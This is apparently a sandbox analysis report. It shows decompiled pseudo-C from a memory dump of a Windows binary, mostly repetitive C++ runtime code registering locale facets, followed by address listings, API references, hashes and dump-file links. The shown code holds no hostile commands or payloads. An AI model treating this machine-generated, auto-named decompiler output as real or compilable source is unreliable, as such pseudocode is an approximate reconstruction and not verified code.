                                                                                                																						_t484 = E00F78A40(_a8, E00F789D0());
                                                                                                																						__eflags = _t484;
                                                                                                																						if(_t484 != 0) {
                                                                                                																							L47:
                                                                                                																							E00F8573E( &_v20);
                                                                                                																							return E00FB388C(_t484);
                                                                                                																						} else {
                                                                                                																							__eflags = _t498;
                                                                                                																							if(__eflags == 0) {
                                                                                                																								_push(_a8);
                                                                                                																								_push( &_v16);
                                                                                                																								__eflags = E00F889E9(_t484, _t498, __eflags) - 0xffffffff;
                                                                                                																								if(__eflags == 0) {
                                                                                                																									E00F78FE0(__eflags);
                                                                                                																									asm("int3");
                                                                                                																									_push(8);
                                                                                                																									E00FB38B2(0xfb6ebe, _t484, _t498);
                                                                                                																									E00F856E6( &_v20, 0);
                                                                                                																									_t499 =  *0xfd0af4; // 0x0
                                                                                                																									_v4 = _v4 & 0x00000000;
                                                                                                																									_v16 = _t499;
                                                                                                																									_t485 = E00F78A40(_a8, E00F789D0());
                                                                                                																									__eflags = _t485;
                                                                                                																									if(_t485 != 0) {
                                                                                                																										L54:
                                                                                                																										E00F8573E( &_v20);
                                                                                                																										return E00FB388C(_t485);
                                                                                                																									} else {
                                                                                                																										__eflags = _t499;
                                                                                                																										if(__eflags == 0) {
                                                                                                																											_push(_a8);
                                                                                                																											_push( &_v16);
                                                                                                																											__eflags = E00F88A6E(_t485, _t499, __eflags) - 0xffffffff;
                                                                                                																											if(__eflags == 0) {
                                                                                                																												E00F78FE0(__eflags);
                                                                                                																												asm("int3");
                                                                                                																												_push(8);
                                                                                                																												E00FB38B2(0xfb6ebe, _t485, _t499);
                                                                                                																												E00F856E6( &_v20, 0);
                                                                                                																												_t500 =  *0xfd0af8; // 0x0
                                                                                                																												_v4 = _v4 & 0x00000000;
                                                                                                																												_v16 = _t500;
                                                                                                																												_t486 = E00F78A40(_a8, E00F789D0());
                                                                                                																												__eflags = _t486;
                                                                                                																												if(_t486 != 0) {
                                                                                                																													L61:
                                                                                                																													E00F8573E( &_v20);
                                                                                                																													return E00FB388C(_t486);
                                                                                                																												} else {
                                                                                                																													__eflags = _t500;
                                                                                                																													if(__eflags == 0) {
                                                                                                																														_push(_a8);
                                                                                                																														_push( &_v16);
                                                                                                																														__eflags = E00F88AD6(_t486, _t500, __eflags) - 0xffffffff;
                                                                                                																														if(__eflags == 0) {
                                                                                                																															E00F78FE0(__eflags);
                                                                                                																															asm("int3");
                                                                                                																															_push(8);
                                                                                                																															E00FB38B2(0xfb6ebe, _t486, _t500);
                                                                                                																															E00F856E6( &_v20, 0);
                                                                                                																															_t501 =  *0xfd0afc; // 0x0
                                                                                                																															_v4 = _v4 & 0x00000000;
                                                                                                																															_v16 = _t501;
                                                                                                																															_t487 = E00F78A40(_a8, E00F789D0());
                                                                                                																															__eflags = _t487;
                                                                                                																															if(_t487 != 0) {
                                                                                                																																L68:
                                                                                                																																E00F8573E( &_v20);
                                                                                                																																return E00FB388C(_t487);
                                                                                                																															} else {
                                                                                                																																__eflags = _t501;
                                                                                                																																if(__eflags == 0) {
                                                                                                																																	_push(_a8);
                                                                                                																																	_push( &_v16);
                                                                                                																																	__eflags = E00F88B3E(_t476, _t487, _t501, __eflags) - 0xffffffff;
                                                                                                																																	if(__eflags == 0) {
                                                                                                																																		E00F78FE0(__eflags);
                                                                                                																																		asm("int3");
                                                                                                																																		_push(8);
                                                                                                																																		E00FB38B2(0xfb6ebe, _t487, _t501);
                                                                                                																																		E00F856E6( &_v20, 0);
                                                                                                																																		_t502 =  *0xfd0b18; // 0x0
                                                                                                																																		_v4 = _v4 & 0x00000000;
                                                                                                																																		_v16 = _t502;
                                                                                                																																		_t488 = E00F78A40(_a8, E00F789D0());
                                                                                                																																		__eflags = _t488;
                                                                                                																																		if(_t488 != 0) {
                                                                                                																																			L75:
                                                                                                																																			E00F8573E( &_v20);
                                                                                                																																			return E00FB388C(_t488);
                                                                                                																																		} else {
                                                                                                																																			__eflags = _t502;
                                                                                                																																			if(__eflags == 0) {
                                                                                                																																				_push(_a8);
                                                                                                																																				_push( &_v16);
                                                                                                																																				__eflags = E00F88BB9(_t488, _t502, __eflags) - 0xffffffff;
                                                                                                																																				if(__eflags == 0) {
                                                                                                																																					E00F78FE0(__eflags);
                                                                                                																																					asm("int3");
                                                                                                																																					_push(8);
                                                                                                																																					E00FB38B2(0xfb6ebe, _t488, _t502);
                                                                                                																																					E00F856E6( &_v20, 0);
                                                                                                																																					_t503 =  *0xfd0ae8; // 0x0
                                                                                                																																					_v4 = _v4 & 0x00000000;
                                                                                                																																					_v16 = _t503;
                                                                                                																																					_t489 = E00F78A40(_a8, E00F789D0());
                                                                                                																																					__eflags = _t489;
                                                                                                																																					if(_t489 != 0) {
                                                                                                																																						L82:
                                                                                                																																						E00F8573E( &_v20);
                                                                                                																																						return E00FB388C(_t489);
                                                                                                																																					} else {
                                                                                                																																						__eflags = _t503;
                                                                                                																																						if(__eflags == 0) {
                                                                                                																																							_push(_a8);
                                                                                                																																							_push( &_v16);
                                                                                                																																							__eflags = E00F88C25(_t489, _t503, __eflags) - 0xffffffff;
                                                                                                																																							if(__eflags == 0) {
                                                                                                																																								E00F78FE0(__eflags);
                                                                                                																																								asm("int3");
                                                                                                																																								_push(8);
                                                                                                																																								E00FB38B2(0xfb6ebe, _t489, _t503);
                                                                                                																																								E00F856E6( &_v20, 0);
                                                                                                																																								_t504 =  *0xfd0b1c; // 0x0
                                                                                                																																								_v4 = _v4 & 0x00000000;
                                                                                                																																								_v16 = _t504;
                                                                                                																																								_t490 = E00F78A40(_a8, E00F789D0());
                                                                                                																																								__eflags = _t490;
                                                                                                																																								if(_t490 != 0) {
                                                                                                																																									L89:
                                                                                                																																									E00F8573E( &_v20);
                                                                                                																																									return E00FB388C(_t490);
                                                                                                																																								} else {
                                                                                                																																									__eflags = _t504;
                                                                                                																																									if(__eflags == 0) {
                                                                                                																																										_push(_a8);
                                                                                                																																										_push( &_v16);
                                                                                                																																										_t302 = E00F88C91(_t490, _t504, __eflags);
                                                                                                																																										_pop(_t436);
                                                                                                																																										__eflags = _t302 - 0xffffffff;
                                                                                                																																										if(__eflags == 0) {
                                                                                                																																											E00F78FE0(__eflags);
                                                                                                																																											asm("int3");
                                                                                                																																											_push(_t504);
                                                                                                																																											_t505 = _t436;
                                                                                                																																											_t158 = _t505 + 0x10;
                                                                                                																																											 *_t158 =  *(_t505 + 0x10) & 0x00000000;
                                                                                                																																											__eflags =  *_t158;
                                                                                                																																											 *((intOrPtr*)(_t505 + 0x14)) = 7;
                                                                                                																																											 *_t505 = 0;
                                                                                                																																											E00F8D9F3(_v48);
                                                                                                																																											return _t505;
                                                                                                																																										} else {
                                                                                                																																											_t490 = _v16;
                                                                                                																																											_v16 = _t490;
                                                                                                																																											_v4 = 1;
                                                                                                																																											E00F85472(_t490);
                                                                                                																																											 *0xfb81fc();
                                                                                                																																											 *((intOrPtr*)( *((intOrPtr*)( *_t490 + 4))))();
                                                                                                																																											 *0xfd0b1c = _t490;
                                                                                                																																											goto L89;
                                                                                                																																										}
                                                                                                																																									} else {
                                                                                                																																										_t490 = _t504;
                                                                                                																																										goto L89;
                                                                                                																																									}
                                                                                                																																								}
                                                                                                																																							} else {
                                                                                                																																								_t489 = _v16;
                                                                                                																																								_v16 = _t489;
                                                                                                																																								_v4 = 1;
                                                                                                																																								E00F85472(_t489);
                                                                                                																																								 *0xfb81fc();
                                                                                                																																								 *((intOrPtr*)( *((intOrPtr*)( *_t489 + 4))))();
                                                                                                																																								 *0xfd0ae8 = _t489;
                                                                                                																																								goto L82;
                                                                                                																																							}
                                                                                                																																						} else {
                                                                                                																																							_t489 = _t503;
                                                                                                																																							goto L82;
                                                                                                																																						}
                                                                                                																																					}
                                                                                                																																				} else {
                                                                                                																																					_t488 = _v16;
                                                                                                																																					_v16 = _t488;
                                                                                                																																					_v4 = 1;
                                                                                                																																					E00F85472(_t488);
                                                                                                																																					 *0xfb81fc();
                                                                                                																																					 *((intOrPtr*)( *((intOrPtr*)( *_t488 + 4))))();
                                                                                                																																					 *0xfd0b18 = _t488;
                                                                                                																																					goto L75;
                                                                                                																																				}
                                                                                                																																			} else {
                                                                                                																																				_t488 = _t502;
                                                                                                																																				goto L75;
                                                                                                																																			}
                                                                                                																																		}
                                                                                                																																	} else {
                                                                                                																																		_t487 = _v16;
                                                                                                																																		_v16 = _t487;
                                                                                                																																		_v4 = 1;
                                                                                                																																		E00F85472(_t487);
                                                                                                																																		 *0xfb81fc();
                                                                                                																																		 *((intOrPtr*)( *((intOrPtr*)( *_t487 + 4))))();
                                                                                                																																		 *0xfd0afc = _t487;
                                                                                                																																		goto L68;
                                                                                                																																	}
                                                                                                																																} else {
                                                                                                																																	_t487 = _t501;
                                                                                                																																	goto L68;
                                                                                                																																}
                                                                                                																															}
                                                                                                																														} else {
                                                                                                																															_t486 = _v16;
                                                                                                																															_v16 = _t486;
                                                                                                																															_v4 = 1;
                                                                                                																															E00F85472(_t486);
                                                                                                																															 *0xfb81fc();
                                                                                                																															 *((intOrPtr*)( *((intOrPtr*)( *_t486 + 4))))();
                                                                                                																															 *0xfd0af8 = _t486;
                                                                                                																															goto L61;
                                                                                                																														}
                                                                                                																													} else {
                                                                                                																														_t486 = _t500;
                                                                                                																														goto L61;
                                                                                                																													}
                                                                                                																												}
                                                                                                																											} else {
                                                                                                																												_t485 = _v16;
                                                                                                																												_v16 = _t485;
                                                                                                																												_v4 = 1;
                                                                                                																												E00F85472(_t485);
                                                                                                																												 *0xfb81fc();
                                                                                                																												 *((intOrPtr*)( *((intOrPtr*)( *_t485 + 4))))();
                                                                                                																												 *0xfd0af4 = _t485;
                                                                                                																												goto L54;
                                                                                                																											}
                                                                                                																										} else {
                                                                                                																											_t485 = _t499;
                                                                                                																											goto L54;
                                                                                                																										}
                                                                                                																									}
                                                                                                																								} else {
                                                                                                																									_t484 = _v16;
                                                                                                																									_v16 = _t484;
                                                                                                																									_v4 = 1;
                                                                                                																									E00F85472(_t484);
                                                                                                																									 *0xfb81fc();
                                                                                                																									 *((intOrPtr*)( *((intOrPtr*)( *_t484 + 4))))();
                                                                                                																									 *0xfd0ae0 = _t484;
                                                                                                																									goto L47;
                                                                                                																								}
                                                                                                																							} else {
                                                                                                																								_t484 = _t498;
                                                                                                																								goto L47;
                                                                                                																							}
                                                                                                																						}
                                                                                                																					} else {
                                                                                                																						_t483 = _v16;
                                                                                                																						_v16 = _t483;
                                                                                                																						_v4 = 1;
                                                                                                																						E00F85472(_t483);
                                                                                                																						 *0xfb81fc();
                                                                                                																						 *((intOrPtr*)( *((intOrPtr*)( *_t483 + 4))))();
                                                                                                																						 *0xfd0ae4 = _t483;
                                                                                                																						goto L40;
                                                                                                																					}
                                                                                                																				} else {
                                                                                                																					_t483 = _t497;
                                                                                                																					goto L40;
                                                                                                																				}
                                                                                                																			}
                                                                                                																		} else {
                                                                                                																			_t482 = _v16;
                                                                                                																			_v16 = _t482;
                                                                                                																			_v4 = 1;
                                                                                                																			E00F85472(_t482);
                                                                                                																			 *0xfb81fc();
                                                                                                																			 *((intOrPtr*)( *((intOrPtr*)( *_t482 + 4))))();
                                                                                                																			 *0xfd0b10 = _t482;
                                                                                                																			goto L33;
                                                                                                																		}
                                                                                                																	} else {
                                                                                                																		_t482 = _t496;
                                                                                                																		goto L33;
                                                                                                																	}
                                                                                                																}
                                                                                                															} else {
                                                                                                																_t481 = _v16;
                                                                                                																_v16 = _t481;
                                                                                                																_v4 = 1;
                                                                                                																E00F85472(_t481);
                                                                                                																 *0xfb81fc();
                                                                                                																 *((intOrPtr*)( *((intOrPtr*)( *_t481 + 4))))();
                                                                                                																 *0xfd0b14 = _t481;
                                                                                                																goto L26;
                                                                                                															}
                                                                                                														} else {
                                                                                                															_t481 = _t495;
                                                                                                															goto L26;
                                                                                                														}
                                                                                                													}
                                                                                                												} else {
                                                                                                													_t480 = _v16;
                                                                                                													_v16 = _t480;
                                                                                                													_v4 = 1;
                                                                                                													E00F85472(_t480);
                                                                                                													 *0xfb81fc();
                                                                                                													 *((intOrPtr*)( *((intOrPtr*)( *_t480 + 4))))();
                                                                                                													 *0xfd0adc = _t480;
                                                                                                													goto L19;
                                                                                                												}
                                                                                                											} else {
                                                                                                												_t480 = _t494;
                                                                                                												goto L19;
                                                                                                											}
                                                                                                										}
                                                                                                									} else {
                                                                                                										_t479 = _v16;
                                                                                                										_v16 = _t479;
                                                                                                										_v4 = 1;
                                                                                                										E00F85472(_t479);
                                                                                                										 *0xfb81fc();
                                                                                                										 *((intOrPtr*)( *((intOrPtr*)( *_t479 + 4))))();
                                                                                                										 *0xfd0b0c = _t479;
                                                                                                										goto L12;
                                                                                                									}
                                                                                                								} else {
                                                                                                									_t479 = _t493;
                                                                                                									goto L12;
                                                                                                								}
                                                                                                							}
                                                                                                						} else {
                                                                                                							_t478 = _v16;
                                                                                                							_v16 = _t478;
                                                                                                							_v4 = 1;
                                                                                                							E00F85472(_t478);
                                                                                                							 *0xfb81fc();
                                                                                                							 *((intOrPtr*)( *((intOrPtr*)( *_t478 + 4))))();
                                                                                                							 *0xfd0ad8 = _t478;
                                                                                                							goto L5;
                                                                                                						}
                                                                                                					} else {
                                                                                                						_t478 = _t492;
                                                                                                						goto L5;
                                                                                                					}
                                                                                                				}
                                                                                                			}





































                                                                                                0x00f872ee
                                                                                                0x00f872f5
                                                                                                0x00f872ff
                                                                                                0x00f87304
                                                                                                0x00f8730f
                                                                                                0x00f87313
                                                                                                0x00f8731f
                                                                                                0x00f87324
                                                                                                0x00f87328
                                                                                                0x00f8736d
                                                                                                0x00f87370
                                                                                                0x00f8737c
                                                                                                0x00f8732a
                                                                                                0x00f8732c
                                                                                                0x00f87332
                                                                                                0x00f87338
                                                                                                0x00f87340
                                                                                                0x00f87343
                                                                                                0x00f8737d
                                                                                                0x00f87382
                                                                                                0x00f87383
                                                                                                0x00f8738a
                                                                                                0x00f87394
                                                                                                0x00f87399
                                                                                                0x00f873a4
                                                                                                0x00f873a8
                                                                                                0x00f873b9
                                                                                                0x00f873bb
                                                                                                0x00f873bd
                                                                                                0x00f87402
                                                                                                0x00f87405
                                                                                                0x00f87411
                                                                                                0x00f873bf
                                                                                                0x00f873bf
                                                                                                0x00f873c1
                                                                                                0x00f873c7
                                                                                                0x00f873cd
                                                                                                0x00f873d5
                                                                                                0x00f873d8
                                                                                                0x00f87412
                                                                                                0x00f87417
                                                                                                0x00f87418
                                                                                                0x00f8741f
                                                                                                0x00f87429
                                                                                                0x00f8742e
                                                                                                0x00f87439
                                                                                                0x00f8743d
                                                                                                0x00f8744e
                                                                                                0x00f87450
                                                                                                0x00f87452
                                                                                                0x00f87497
                                                                                                0x00f8749a
                                                                                                0x00f874a6
                                                                                                0x00f87454
                                                                                                0x00f87454
                                                                                                0x00f87456
                                                                                                0x00f8745c
                                                                                                0x00f87462
                                                                                                0x00f8746a
                                                                                                0x00f8746d
                                                                                                0x00f874a7
                                                                                                0x00f874ac
                                                                                                0x00f874ad
                                                                                                0x00f874b4
                                                                                                0x00f874be
                                                                                                0x00f874c3
                                                                                                0x00f874ce
                                                                                                0x00f874d2
                                                                                                0x00f874e3
                                                                                                0x00f874e5
                                                                                                0x00f874e7
                                                                                                0x00f8752c
                                                                                                0x00f8752f
                                                                                                0x00f8753b
                                                                                                0x00f874e9
                                                                                                0x00f874e9
                                                                                                0x00f874eb
                                                                                                0x00f874f1
                                                                                                0x00f874f7
                                                                                                0x00f874ff
                                                                                                0x00f87502
                                                                                                0x00f8753c
                                                                                                0x00f87541
                                                                                                0x00f87542
                                                                                                0x00f87549
                                                                                                0x00f87553
                                                                                                0x00f87558
                                                                                                0x00f87563
                                                                                                0x00f87567
                                                                                                0x00f87578
                                                                                                0x00f8757a
                                                                                                0x00f8757c
                                                                                                0x00f875c1
                                                                                                0x00f875c4
                                                                                                0x00f875d0
                                                                                                0x00f8757e
                                                                                                0x00f8757e
                                                                                                0x00f87580
                                                                                                0x00f87586
                                                                                                0x00f8758c
                                                                                                0x00f87594
                                                                                                0x00f87597
                                                                                                0x00f875d1
                                                                                                0x00f875d6
                                                                                                0x00f875d7
                                                                                                0x00f875de
                                                                                                0x00f875e8
                                                                                                0x00f875ed
                                                                                                0x00f875f8
                                                                                                0x00f875fc
                                                                                                0x00f8760d
                                                                                                0x00f8760f
                                                                                                0x00f87611
                                                                                                0x00f87656
                                                                                                0x00f87659
                                                                                                0x00f87665
                                                                                                0x00f87613
                                                                                                0x00f87613
                                                                                                0x00f87615
                                                                                                0x00f8761b
                                                                                                0x00f87621
                                                                                                0x00f87629
                                                                                                0x00f8762c
                                                                                                0x00f87666
                                                                                                0x00f8766b
                                                                                                0x00f8766c
                                                                                                0x00f87673
                                                                                                0x00f8767d
                                                                                                0x00f87682
                                                                                                0x00f8768d
                                                                                                0x00f87691
                                                                                                0x00f876a2
                                                                                                0x00f876a4
                                                                                                0x00f876a6
                                                                                                0x00f876eb
                                                                                                0x00f876ee
                                                                                                0x00f876fa
                                                                                                0x00f876a8
                                                                                                0x00f876a8
                                                                                                0x00f876aa
                                                                                                0x00f876b0
                                                                                                0x00f876b6
                                                                                                0x00f876be
                                                                                                0x00f876c1
                                                                                                0x00f876fb
                                                                                                0x00f87700
                                                                                                0x00f87701
                                                                                                0x00f87708
                                                                                                0x00f87712
                                                                                                0x00f87717
                                                                                                0x00f87722
                                                                                                0x00f87726
                                                                                                0x00f87737
                                                                                                0x00f87739
                                                                                                0x00f8773b
                                                                                                0x00f87780
                                                                                                0x00f87783
                                                                                                0x00f8778f
                                                                                                0x00f8773d
                                                                                                0x00f8773d
                                                                                                0x00f8773f
                                                                                                0x00f87745
                                                                                                0x00f8774b
                                                                                                0x00f87753
                                                                                                0x00f87756
                                                                                                0x00f87790
                                                                                                0x00f87795
                                                                                                0x00f87796
                                                                                                0x00f8779d
                                                                                                0x00f877a7
                                                                                                0x00f877ac
                                                                                                0x00f877b7
                                                                                                0x00f877bb
                                                                                                0x00f877cc
                                                                                                0x00f877ce
                                                                                                0x00f877d0
                                                                                                0x00f87815
                                                                                                0x00f87818
                                                                                                0x00f87824
                                                                                                0x00f877d2
                                                                                                0x00f877d2
                                                                                                0x00f877d4
                                                                                                0x00f877da
                                                                                                0x00f877e0
                                                                                                0x00f877e8
                                                                                                0x00f877eb
                                                                                                0x00f87825
                                                                                                0x00f8782a
                                                                                                0x00f8782b
                                                                                                0x00f87832
                                                                                                0x00f8783c
                                                                                                0x00f87841
                                                                                                0x00f8784c
                                                                                                0x00f87850
                                                                                                0x00f87861
                                                                                                0x00f87863
                                                                                                0x00f87865
                                                                                                0x00f878aa
                                                                                                0x00f878ad
                                                                                                0x00f878b9
                                                                                                0x00f87867
                                                                                                0x00f87867
                                                                                                0x00f87869
                                                                                                0x00f8786f
                                                                                                0x00f87875
                                                                                                0x00f8787d
                                                                                                0x00f87880
                                                                                                0x00f878ba
                                                                                                0x00f878bf
                                                                                                0x00f878c0
                                                                                                0x00f878c7
                                                                                                0x00f878d1
                                                                                                0x00f878d6
                                                                                                0x00f878e1
                                                                                                0x00f878e5
                                                                                                0x00f878f6
                                                                                                0x00f878f8
                                                                                                0x00f878fa
                                                                                                0x00f8793f
                                                                                                0x00f87942
                                                                                                0x00f8794e
                                                                                                0x00f878fc
                                                                                                0x00f878fc
                                                                                                0x00f878fe
                                                                                                0x00f87904
                                                                                                0x00f8790a
                                                                                                0x00f87912
                                                                                                0x00f87915
                                                                                                0x00f8794f
                                                                                                0x00f87954
                                                                                                0x00f87955
                                                                                                0x00f8795c
                                                                                                0x00f87966
                                                                                                0x00f8796b
                                                                                                0x00f87976
                                                                                                0x00f8797a
                                                                                                0x00f8798b
                                                                                                0x00f8798d
                                                                                                0x00f8798f
                                                                                                0x00f879d4
                                                                                                0x00f879d7
                                                                                                0x00f879e3
                                                                                                0x00f87991
                                                                                                0x00f87991
                                                                                                0x00f87993
                                                                                                0x00f87999
                                                                                                0x00f8799f
                                                                                                0x00f879a7
                                                                                                0x00f879aa
                                                                                                0x00f879e4
                                                                                                0x00f879e9
                                                                                                0x00f879ea
                                                                                                0x00f879f1
                                                                                                0x00f879fb
                                                                                                0x00f87a00
                                                                                                0x00f87a0b
                                                                                                0x00f87a0f
                                                                                                0x00f87a20
                                                                                                0x00f87a22
                                                                                                0x00f87a24
                                                                                                0x00f87a69
                                                                                                0x00f87a6c
                                                                                                0x00f87a78
                                                                                                0x00f87a26
                                                                                                0x00f87a26
                                                                                                0x00f87a28
                                                                                                0x00f87a2e
                                                                                                0x00f87a34
                                                                                                0x00f87a35
                                                                                                0x00f87a3b
                                                                                                0x00f87a3c
                                                                                                0x00f87a3f
                                                                                                0x00f87a79
                                                                                                0x00f87a7e
                                                                                                0x00f87a82
                                                                                                0x00f87a86
                                                                                                0x00f87a8a
                                                                                                0x00f87a8a
                                                                                                0x00f87a8a
                                                                                                0x00f87a8e
                                                                                                0x00f87a95
                                                                                                0x00f87a98
                                                                                                0x00f87aa1
                                                                                                0x00f87a41
                                                                                                0x00f87a41
                                                                                                0x00f87a44
                                                                                                0x00f87a48
                                                                                                0x00f87a4c
                                                                                                0x00f87a59
                                                                                                0x00f87a61
                                                                                                0x00f87a63
                                                                                                0x00000000
                                                                                                0x00f87a63
                                                                                                0x00f87a2a
                                                                                                0x00f87a2a
                                                                                                0x00000000
                                                                                                0x00f87a2a
                                                                                                0x00f87a28
                                                                                                0x00f879ac
                                                                                                0x00f879ac
                                                                                                0x00f879af
                                                                                                0x00f879b3
                                                                                                0x00f879b7
                                                                                                0x00f879c4
                                                                                                0x00f879cc
                                                                                                0x00f879ce
                                                                                                0x00000000
                                                                                                0x00f879ce
                                                                                                0x00f87995
                                                                                                0x00f87995
                                                                                                0x00000000
                                                                                                0x00f87995
                                                                                                0x00f87993
                                                                                                0x00f87917
                                                                                                0x00f87917
                                                                                                0x00f8791a
                                                                                                0x00f8791e
                                                                                                0x00f87922
                                                                                                0x00f8792f
                                                                                                0x00f87937
                                                                                                0x00f87939
                                                                                                0x00000000
                                                                                                0x00f87939
                                                                                                0x00f87900
                                                                                                0x00f87900
                                                                                                0x00000000
                                                                                                0x00f87900
                                                                                                0x00f878fe
                                                                                                0x00f87882
                                                                                                0x00f87882
                                                                                                0x00f87885
                                                                                                0x00f87889
                                                                                                0x00f8788d
                                                                                                0x00f8789a
                                                                                                0x00f878a2
                                                                                                0x00f878a4
                                                                                                0x00000000
                                                                                                0x00f878a4
                                                                                                0x00f8786b
                                                                                                0x00f8786b
                                                                                                0x00000000
                                                                                                0x00f8786b
                                                                                                0x00f87869
                                                                                                0x00f877ed
                                                                                                0x00f877ed
                                                                                                0x00f877f0
                                                                                                0x00f877f4
                                                                                                0x00f877f8
                                                                                                0x00f87805
                                                                                                0x00f8780d
                                                                                                0x00f8780f
                                                                                                0x00000000
                                                                                                0x00f8780f
                                                                                                0x00f877d6
                                                                                                0x00f877d6
                                                                                                0x00000000
                                                                                                0x00f877d6
                                                                                                0x00f877d4
                                                                                                0x00f87758
                                                                                                0x00f87758
                                                                                                0x00f8775b
                                                                                                0x00f8775f
                                                                                                0x00f87763
                                                                                                0x00f87770
                                                                                                0x00f87778
                                                                                                0x00f8777a
                                                                                                0x00000000
                                                                                                0x00f8777a
                                                                                                0x00f87741
                                                                                                0x00f87741
                                                                                                0x00000000
                                                                                                0x00f87741
                                                                                                0x00f8773f
                                                                                                0x00f876c3
                                                                                                0x00f876c3
                                                                                                0x00f876c6
                                                                                                0x00f876ca
                                                                                                0x00f876ce
                                                                                                0x00f876db
                                                                                                0x00f876e3
                                                                                                0x00f876e5
                                                                                                0x00000000
                                                                                                0x00f876e5
                                                                                                0x00f876ac
                                                                                                0x00f876ac
                                                                                                0x00000000
                                                                                                0x00f876ac
                                                                                                0x00f876aa
                                                                                                0x00f8762e
                                                                                                0x00f8762e
                                                                                                0x00f87631
                                                                                                0x00f87635
                                                                                                0x00f87639
                                                                                                0x00f87646
                                                                                                0x00f8764e
                                                                                                0x00f87650
                                                                                                0x00000000
                                                                                                0x00f87650
                                                                                                0x00f87617
                                                                                                0x00f87617
                                                                                                0x00000000
                                                                                                0x00f87617
                                                                                                0x00f87615
                                                                                                0x00f87599
                                                                                                0x00f87599
                                                                                                0x00f8759c
                                                                                                0x00f875a0
                                                                                                0x00f875a4
                                                                                                0x00f875b1
                                                                                                0x00f875b9
                                                                                                0x00f875bb
                                                                                                0x00000000
                                                                                                0x00f875bb
                                                                                                0x00f87582
                                                                                                0x00f87582
                                                                                                0x00000000
                                                                                                0x00f87582
                                                                                                0x00f87580
                                                                                                0x00f87504
                                                                                                0x00f87504
                                                                                                0x00f87507
                                                                                                0x00f8750b
                                                                                                0x00f8750f
                                                                                                0x00f8751c
                                                                                                0x00f87524
                                                                                                0x00f87526
                                                                                                0x00000000
                                                                                                0x00f87526
                                                                                                0x00f874ed
                                                                                                0x00f874ed
                                                                                                0x00000000
                                                                                                0x00f874ed
                                                                                                0x00f874eb
                                                                                                0x00f8746f
                                                                                                0x00f8746f
                                                                                                0x00f87472
                                                                                                0x00f87476
                                                                                                0x00f8747a
                                                                                                0x00f87487
                                                                                                0x00f8748f
                                                                                                0x00f87491
                                                                                                0x00000000
                                                                                                0x00f87491
                                                                                                0x00f87458
                                                                                                0x00f87458
                                                                                                0x00000000
                                                                                                0x00f87458
                                                                                                0x00f87456
                                                                                                0x00f873da
                                                                                                0x00f873da
                                                                                                0x00f873dd
                                                                                                0x00f873e1
                                                                                                0x00f873e5
                                                                                                0x00f873f2
                                                                                                0x00f873fa
                                                                                                0x00f873fc
                                                                                                0x00000000
                                                                                                0x00f873fc
                                                                                                0x00f873c3
                                                                                                0x00f873c3
                                                                                                0x00000000
                                                                                                0x00f873c3
                                                                                                0x00f873c1
                                                                                                0x00f87345
                                                                                                0x00f87345
                                                                                                0x00f87348
                                                                                                0x00f8734c
                                                                                                0x00f87350
                                                                                                0x00f8735d
                                                                                                0x00f87365
                                                                                                0x00f87367
                                                                                                0x00000000
                                                                                                0x00f87367
                                                                                                0x00f8732e
                                                                                                0x00f8732e
                                                                                                0x00000000
                                                                                                0x00f8732e
                                                                                                0x00f8732c

                                                                                                APIs
                                                                                                • __EH_prolog3.LIBCMT ref: 00F872F5
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00F872FF
                                                                                                  • Part of subcall function 00F789D0: std::_Lockit::_Lockit.LIBCPMT ref: 00F78A00
                                                                                                  • Part of subcall function 00F789D0: std::_Lockit::~_Lockit.LIBCPMT ref: 00F78A28
                                                                                                • std::_Facet_Register.LIBCPMT ref: 00F87350
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F87370
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                • String ID:
                                                                                                • API String ID: 2854358121-0
                                                                                                • Opcode ID: b80734ba59b281e2a6190acc0ab62b9deb880d334e0799555358192dca6cdf8f
                                                                                                • Instruction ID: 539de04841a214f8b8a75431fd68ed9142c051ccf86ad40cb5dbc6ccbdbe52a5
                                                                                                • Opcode Fuzzy Hash: b80734ba59b281e2a6190acc0ab62b9deb880d334e0799555358192dca6cdf8f
                                                                                                • Instruction Fuzzy Hash: 7F01A1359042299BCB04FB64CC457EE77B1AF84760F64400AE805AB391DF38DE02BB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 71%
                                                                                                			E00F87259(void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
                                                                                                				signed int _v4;
                                                                                                				signed int _v16;
                                                                                                				char _v20;
                                                                                                				intOrPtr _v52;
                                                                                                				signed int _t177;
                                                                                                				void* _t325;
                                                                                                				short* _t469;
                                                                                                				void* _t512;
                                                                                                				signed int _t515;
                                                                                                				signed int _t516;
                                                                                                				signed int _t517;
                                                                                                				signed int _t518;
                                                                                                				signed int _t519;
                                                                                                				signed int _t520;
                                                                                                				signed int _t521;
                                                                                                				signed int _t522;
                                                                                                				signed int _t523;
                                                                                                				signed int _t524;
                                                                                                				signed int _t525;
                                                                                                				signed int _t526;
                                                                                                				signed int _t527;
                                                                                                				signed int _t529;
                                                                                                				signed int _t530;
                                                                                                				signed int _t531;
                                                                                                				signed int _t532;
                                                                                                				signed int _t533;
                                                                                                				signed int _t534;
                                                                                                				signed int _t535;
                                                                                                				signed int _t536;
                                                                                                				signed int _t537;
                                                                                                				signed int _t538;
                                                                                                				signed int _t539;
                                                                                                				signed int _t540;
                                                                                                				signed int _t541;
                                                                                                				signed int _t542;
                                                                                                				short* _t543;
                                                                                                
                                                                                                				_push(8);
                                                                                                				E00FB38B2(0xfb6ebe, __edi, __esi);
                                                                                                				E00F856E6( &_v20, 0);
                                                                                                				_t529 =  *0xfd0b08; // 0x0
                                                                                                				_v4 = _v4 & 0x00000000;
                                                                                                				_v16 = _t529;
                                                                                                				_t177 = E00F78A40(_a8, E00F789D0());
                                                                                                				_t514 = _t177;
                                                                                                				if(_t177 != 0) {
                                                                                                					L5:
                                                                                                					E00F8573E( &_v20);
                                                                                                					return E00FB388C(_t514);
                                                                                                				} else {
                                                                                                					if(_t529 == 0) {
